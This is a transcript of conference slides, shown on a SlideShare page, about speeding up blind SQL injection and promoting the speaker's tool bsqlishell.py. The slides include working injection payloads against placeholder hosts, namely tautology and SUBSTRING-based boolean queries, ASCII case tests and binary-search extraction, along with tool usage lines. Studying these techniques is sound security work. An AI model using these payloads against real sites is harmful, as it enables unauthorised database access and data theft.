Your SlideShare is downloading. ×
Blind SQL Injection - Optimization Techniques
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Blind SQL Injection - Optimization Techniques

10,981

Published on

Published in: Technology
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
10,981
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
116
Comments
0
Likes
3
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Blind SQL injection Optimization techniques Rodrigo Marcos December 2007
  • 2. Agenda
    • What is (blind) SQL injection
    • Available Open Source tools
    • Blind SQL injection optimizations
    • Demo
    • Conclusions
    • Questions
  • 3. What is SQL injection?
    • Well known and exploited technique
    • Mainly exploited in web environments
    • It abuses improper user input validation
    • Allows an attacker to reach the database
  • 4. SQL injection example
    • http://victim/listproducts.asp?cat= books
    • SELECT * from PRODUCTS WHERE category=‘ books ’
    • http://victim/listproducts.asp?cat= books’ or ‘1’=‘1
    • SELECT * from PRODUCTS WHERE category=‘ books’ or ‘1’=‘1 ’
    • Basically, on SQL injection the attacker gets results.
  • 5. What is blind SQL injection?
    • Same vulnerability as SQL injection
    • *Very* common vulnerability
    • Sometimes (wrongly) ignored during tests as unexploitable or not detected
    • The attacker can not retrieve results
    • The attacker can only retrieve a True/False condition
  • 6. Blind SQL injection example
    • http://victim/showproduct.asp?id= 238
    • SELECT * from PRODUCTS WHERE id= 238
    • Sometimes, due to the code surronding the SQL query (grouped or sorted) the attacker can’t UNION and no ‘good’ ways of exploitation are found
    • http://victim/showproduct.asp?id= 238 and 1=1
    • http://victim/showproduct.asp?id= 238 and 1=2
    • SELECT * from PRODUCTS WHERE id= 238 and 1=1
    • SELECT * from PRODUCTS WHERE id= 238 and 1=2
    • Blind SQL happens if the requests above return different results
  • 7. Exploiting True/False conditions
    • Select user returns ‘dbo’
    • SUBSTRING(‘Select user’, 1, 1) = ‘d’
    • SUBSTRING(‘Select user’, 2, 1) = ‘b’
    • SUBSTRING(‘Select user’, 3, 1) = ‘o’
    • http://victim/showproduct.asp?id= 238 and SUBSTRING(‘Select user’, 1, 1) = ‘d’  TRUE
    • http://victim/showproduct.asp?id= 238 and SUBSTRING(‘Select user’, 1, 1) = ‘X’  FALSE
  • 8. Available solutions
    • Custom Script: We can script it and discover each letter
      • Set a space: [a-z] + [A-Z] + [0-9] + [symbols]
      • Loop for every character
    • Absinthe
      • http://www.0x90.org/releases/absinthe/
    • BSQLBF
      • http://www.unsec.net/download/bsqlbf.pl
      • http://www.unsec.net/download/bsqlbf.avi
    • SQLMap, SQLBrute.py
  • 9. Available solutions
    • Custom scripts: Not reusable. I got sick of writing dirty BSQL injection scripts…
    • Available open source tools:
      • Some of them are too dumb trying to be smart (and don’t work in special situations)
      • Most are not interactive
      • None are optimized for speed
  • 10. Blind SQL injections optimizations
    • Narrow down the charset:
      • ASCII( UPPER (SUBSTRING((SQL Query), Position, 1)))= ASCII(SUBSTRING((SQL Query), Position, 1))
      • ASCII( LOWER (SUBSTRING((SQL Query), Position, 1)))= ASCII(SUBSTRING((SQL Query), Position, 1))
      • If first one true, character is uppercase
      • If second one true, character is uppercase
      • If both are true, it is a number or symbol
  • 11. Blind SQL injections optimizations
    • Searching character space:
    • [a,b,c,d,e,f,g,h,I,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z]
    • Sequential search: Not optimum
    • Divide and conquer!
      • Character => ‘m’
        • [m,n,o,p,q,r,s,t,u,v,w,x,y,z]
      • else
        • [a,b,c,d,e,f,g,h,I,j,k,l]
  • 12. Blind SQL injections optimizations
    • Big numbers for table enumeration
    • Typical MSSQL table id: 2089058478
    • Absinthe:
      • Increase exponentially from 0 by factor of two
      • Narrow down when upper limit is discovered
    • Optimization:
      • CAST(Number as varchar) and treat is as a string with numbers
  • 13. bsqlishell.py
    • I wanted to code something generic to forget about custom scripts
    • I wanted to write optimum techniques as BSQL injection is *REALLY* slow
    • Interactive shell + scriptable (Scapy like)
    • bsqlishell.py is fast(er)!!
    • Portable (python rocks!)
  • 14. Demo
  • 15. and more…
    • Interaction sucks! I want something scriptable!
    • from bsishell import *
    • pre = “http://www.vulnerable.com?id=1’ and “
    • post = “ or ‘1’=‘2”
    • user()
    • table_enumeration()
  • 16. Conclusions
    • Blind SQL injection can be exploited and it really makes a difference
    • The attack can be optimized for fewer requests to the database
    • bsqlishell.py is quite cool (shameless propaganda)
  • 17. Thanks
    • Questions?

×